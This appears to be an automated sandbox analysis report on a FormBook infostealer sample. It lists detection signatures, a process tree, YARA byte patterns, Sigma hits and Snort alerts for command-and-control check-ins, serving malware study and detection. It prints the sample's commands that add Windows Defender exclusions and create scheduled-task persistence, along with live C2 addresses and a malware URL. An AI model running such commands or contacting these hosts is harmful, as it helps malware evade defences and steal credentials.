Edit tour

Windows Analysis Report
TT-Slip.bat.exe

Overview

General Information

Sample name:	TT-Slip.bat.exe
Analysis ID:	1449570
MD5:	0c7240337b784add7b481b55e4326e66
SHA1:	5ecebe1f9847fa2b9b1374f85f11be0d98ae13c2
SHA256:	2e0c808b08f36e34e0e37530c8b5d4080fb654bdf12cae1e17a2adbdace21cd7
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

TT-Slip.bat.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\TT-Slip.bat.exe" MD5: 0C7240337B784ADD7B481B55E4326E66)

powershell.exe (PID: 348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2820 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6456 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TT-Slip.bat.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\TT-Slip.bat.exe" MD5: 0C7240337B784ADD7B481B55E4326E66)

ISsofSsdrAsp.exe (PID: 4816 cmdline: "C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

compact.exe (PID: 7596 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)

ISsofSsdrAsp.exe (PID: 6428 cmdline: "C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7848 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

IiIseKTckjhZgQ.exe (PID: 1628 cmdline: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe MD5: 0C7240337B784ADD7B481B55E4326E66)

schtasks.exe (PID: 7340 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

IiIseKTckjhZgQ.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe" MD5: 0C7240337B784ADD7B481B55E4326E66)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2aae0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1403f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2aae0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1403f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e9c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17f26:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2aae0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1403f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2aae0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1403f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e0b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x463b88:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x44d0e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x463b88:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x44d0e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: TT-Slip.bat.exe PID: 6412	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: IiIseKTckjhZgQ.exe PID: 1628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.TT-Slip.bat.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.TT-Slip.bat.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16812:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.TT-Slip.bat.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.TT-Slip.bat.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e0b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT-Slip.bat.exe", ParentImage: C:\Users\user\Desktop\TT-Slip.bat.exe, ParentProcessId: 6412, ParentProcessName: TT-Slip.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe", ProcessId: 348, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe, ParentImage: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe, ParentProcessId: 1628, ParentProcessName: IiIseKTckjhZgQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmpBA10.tmp", ProcessId: 7340, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT-Slip.bat.exe", ParentImage: C:\Users\user\Desktop\TT-Slip.bat.exe, ParentProcessId: 6412, ParentProcessName: TT-Slip.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp", ProcessId: 6456, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT-Slip.bat.exe", ParentImage: C:\Users\user\Desktop\TT-Slip.bat.exe, ParentProcessId: 6412, ParentProcessName: TT-Slip.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe", ProcessId: 348, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT-Slip.bat.exe", ParentImage: C:\Users\user\Desktop\TT-Slip.bat.exe, ParentProcessId: 6412, ParentProcessName: TT-Slip.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IiIseKTckjhZgQ" /XML "C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp", ProcessId: 6456, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 195.35.39.119

Timestamp:	05/30/24-15:01:53.884972
SID:	2844299
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 66.96.162.149

Timestamp:	05/30/24-15:04:54.737507
SID:	2844299
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 64.46.118.35

Timestamp:	05/30/24-15:02:39.788191
SID:	2844299
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 15.204.0.108

Timestamp:	05/30/24-15:03:41.711791
SID:	2844299
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 54.179.173.60

Timestamp:	05/30/24-15:02:54.714138
SID:	2844299
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 66.96.162.149

Timestamp:	05/30/24-15:05:02.336329
SID:	2855465
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 18.178.206.118

Timestamp:	05/30/24-15:04:48.666326
SID:	2855465
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 162.0.213.94

Timestamp:	05/30/24-15:03:21.696469
SID:	2844299
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 15.204.0.108

Timestamp:	05/30/24-15:03:49.320168
SID:	2844299
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 194.9.94.86

Timestamp:	05/30/24-15:04:07.804662
SID:	2844299
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 194.9.94.86

Timestamp:	05/30/24-15:04:12.883535
SID:	2855465
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 35.214.235.206

Timestamp:	05/30/24-15:04:26.490746
SID:	2855465
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 195.35.39.119

Timestamp:	05/30/24-15:01:53.884972
SID:	2855465
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 185.137.235.125

Timestamp:	05/30/24-15:02:26.075643
SID:	2844299
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 15.204.0.108

Timestamp:	05/30/24-15:03:44.240922
SID:	2844299
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 35.214.235.206

Timestamp:	05/30/24-15:04:26.490746
SID:	2844299
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 162.241.2.254

Timestamp:	05/30/24-15:02:17.759709
SID:	2855465
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 66.96.162.149

Timestamp:	05/30/24-15:04:57.271773
SID:	2844299
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 35.214.235.206

Timestamp:	05/30/24-15:04:18.617047
SID:	2844299
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 64.46.118.35

Timestamp:	05/30/24-15:02:44.852667
SID:	2844299
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 162.0.213.94

Timestamp:	05/30/24-15:03:14.076659
SID:	2844299
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 172.82.177.221

Timestamp:	05/30/24-15:03:35.574703
SID:	2844299
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 18.178.206.118

Timestamp:	05/30/24-15:04:41.047717
SID:	2844299
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 18.178.206.118

Timestamp:	05/30/24-15:04:48.666326
SID:	2844299
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 162.0.213.94

Timestamp:	05/30/24-15:03:21.696469
SID:	2855465
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 194.9.94.86

Timestamp:	05/30/24-15:04:12.883535
SID:	2844299
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 162.241.2.254

Timestamp:	05/30/24-15:02:12.367937
SID:	2844299
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 64.46.118.35

Timestamp:	05/30/24-15:02:44.852667
SID:	2855465
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 194.9.94.86

Timestamp:	05/30/24-15:04:05.262156
SID:	2844299
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 185.137.235.125

Timestamp:	05/30/24-15:02:23.540355
SID:	2844299
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 54.179.173.60

Timestamp:	05/30/24-15:02:59.772899
SID:	2844299
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 185.137.235.125

Timestamp:	05/30/24-15:02:31.154627
SID:	2844299
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 172.82.177.221

Timestamp:	05/30/24-15:03:35.574703
SID:	2855465
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 64.46.118.35

Timestamp:	05/30/24-15:02:37.254955
SID:	2844299
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 172.82.177.221

Timestamp:	05/30/24-15:03:27.976839
SID:	2844299
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 54.179.173.60

Timestamp:	05/30/24-15:02:52.166621
SID:	2844299
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 35.214.235.206

Timestamp:	05/30/24-15:04:21.152967
SID:	2844299
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 185.137.235.125

Timestamp:	05/30/24-15:02:31.154627
SID:	2855465
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 18.178.206.118

Timestamp:	05/30/24-15:04:43.592360
SID:	2844299
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 162.241.2.254

Timestamp:	05/30/24-15:02:09.829422
SID:	2844299
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 54.179.173.60

Timestamp:	05/30/24-15:02:59.772899
SID:	2855465
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 172.82.177.221

Timestamp:	05/30/24-15:03:30.506003
SID:	2844299
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 162.241.2.254

Timestamp:	05/30/24-15:02:17.759709
SID:	2844299
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 66.96.162.149

Timestamp:	05/30/24-15:05:02.336329
SID:	2844299
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN MSIL/Juliens Botnet User-Agent - Source IP: 192.168.2.5 - Destination IP: 162.0.213.94

Timestamp:	05/30/24-15:03:16.623154
SID:	2844299
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 15.204.0.108

Timestamp:	05/30/24-15:03:49.320168
SID:	2855465
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.931951.com/2ha1/	Avira URL Cloud: Label: malware
